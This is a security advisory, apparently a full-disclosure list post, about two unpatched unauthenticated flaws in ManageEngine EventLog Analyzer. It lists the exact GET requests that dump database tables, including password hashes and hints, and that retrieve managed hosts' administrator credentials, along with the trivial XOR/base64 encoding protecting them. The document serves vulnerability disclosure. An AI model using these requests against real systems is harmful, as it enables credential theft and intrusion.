Hi,
This is the 6th part of the ManageOwnage series. For previous parts see [1].
This time we have two 0 day vulns (CVE-2014-6038 and 6039) that can be
abused to dump information from the database and obtain the superuser
credentials for Windows and AS/400 hosts which are managed by EventLog
Analyzer. A Metasploit module has also been released and should be
integrated in the framework in the next few days [2].
I'm releasing these as a 0 day since it's been 70 days since I
informed ManageEngine of this vulnerability and they have been
twiddling their thumbs ever since. The last update I got was that they
were "working on fixing it but couldn't commit to a date; the
tentative date is end of the year".
Since they have been vulnerable to a more serious remote code
execution 0 day for 67 days now (see [3]), I'm not holding this any
longer.
Details and timeline of disclosure are below, and a copy of this
advisory can be found at my repo [4].
Regards,
Pedro
Disclosure: 05/11/2014 / Last updated: 05/11/2014
>> Background on the affected product:
"EventLog Analyzer provides the most cost-effective Security
Information and Event Management (SIEM) software on the market. Using
this Log Analyzer software, organizations can automate the entire
process of managing terabytes of machine generated logs by collecting,
analyzing, correlating, searching, reporting, and archiving from one
central location. This event log analyzer software helps to monitor
file integrity, conduct log forensics analysis, monitor privileged
users and comply to different compliance regulatory bodies by
intelligently analyzing your logs and instantly generating a variety
of reports like user activity reports, historical trend reports, and
more."
A Metasploit exploit that abuses these two vulnerabilities to obtain
the managed device superuser credentials has been released.
#1
Vulnerability: SQL database information disclosure (read any table in
the database)
CVE-2014-6038
Constraints: none; no authentication or any other information needed.
On v7 the url has to be prepended with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.
GET /agentHandler?mode=getTableData&table=[tableName]
GET /agentHandler?mode=getTableData&table=AaaUser –> user logins
GET /agentHandler?mode=getTableData&table=AaaPassword –> user
passwords (MD5 hashed) and salts
GET /agentHandler?mode=getTableData&table=AaaPasswordHint –> user
password hints
GET /agentHandler?mode=getTableData&table=HostDetails –> Windows /
AS/400 managed hosts Administrator usernames and passwords (XOR'ed
with 0x30)
#2
Vulnerability: Windows / AS/400 managed hosts Administrator
credentials disclosure
CVE-2014-6039
Constraints: none; no authentication or any other information needed.
On v7 the url has to be prepended with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.
GET /hostdetails?slid=X&hostid=Y
GET /hostdetails?slid=1&hostid=1 –> Windows / AS/400 hosts superuser
username and password (XOR'ed with 0x30 and base64 encoded)
>> Fix:
UNFIXED - ManageEngine failed to take action after 70 days.
Timeline of disclosure:
28/08/2014
28/08/2014
31/08/2014
11/09/2014
13/10/2014
17/10/2014
19/10/2014
05/11/2014
[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
[2]
https://github.com/rapid7/metasploit-framework/pull/4137
[3]
http://seclists.org/fulldisclosure/2014/Aug/88
[4]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt